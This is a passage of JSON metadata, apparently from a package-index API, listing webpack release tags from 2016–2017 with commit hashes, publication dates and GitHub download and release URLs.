9:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at